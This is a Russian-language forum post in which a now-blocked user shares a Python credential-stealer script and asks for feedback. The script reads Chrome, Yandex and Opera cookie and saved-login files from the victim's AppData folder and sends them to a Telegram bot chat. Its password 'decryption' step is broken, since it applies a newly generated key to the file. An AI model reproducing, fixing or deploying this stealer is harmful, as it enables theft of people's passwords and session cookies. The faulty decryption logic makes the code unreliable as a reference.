Пожалуйста, обратите внимание, что пользователь заблокирован
вот скрипт вора на питоне, хотелось бы мнения более опытных людей
Python:
import getpass
import random
import telebot
import cryptography
from cryptography.fernet import Fernet
# Replace "YOUR_BOT_TOKEN" with your actual bot token
bot = telebot.TeleBot("YOUR_BOT_TOKEN")
fldr = 'C:\\Users'+'\\' + getpass.getuser()+'\\AppData\\'
files = [
("google","Local\\Google\\Chrome\\User Data\\Default\\Cookies","Local\\Google\\Chrome\\User Data\\Default\\Login Data"),
("yandex","Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies","Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"),
("opera","Roaming\\Opera Software\\Opera Stable\\Cookies","Roaming\\Opera Software\\Opera Stable\\Login Data")
#("firefox", "", "")
]
def check():
global files
key = Fernet.generate_key()
cipher_suite = Fernet(key)
for f in files:
try:
with open(fldr+f[1], "rb") as content:
# Send the cookie data to Telegram
bot.send_document(chat_id="YOUR_TELEGRAM_CHAT_ID", document=content.read())
with open(fldr+f[2], "rb") as content:
encrypted_pass = content.read()
# Decrypt the password data
decrypted_pass = cipher_suite.decrypt(encrypted_pass)
# Send the decrypted password data to Telegram
bot.send_message(chat_id="YOUR_TELEGRAM_CHAT_ID", text=decrypted_pass.decode())
except Exception as err:
#print(err)
print('There is no '+f[0]+' here.')
check()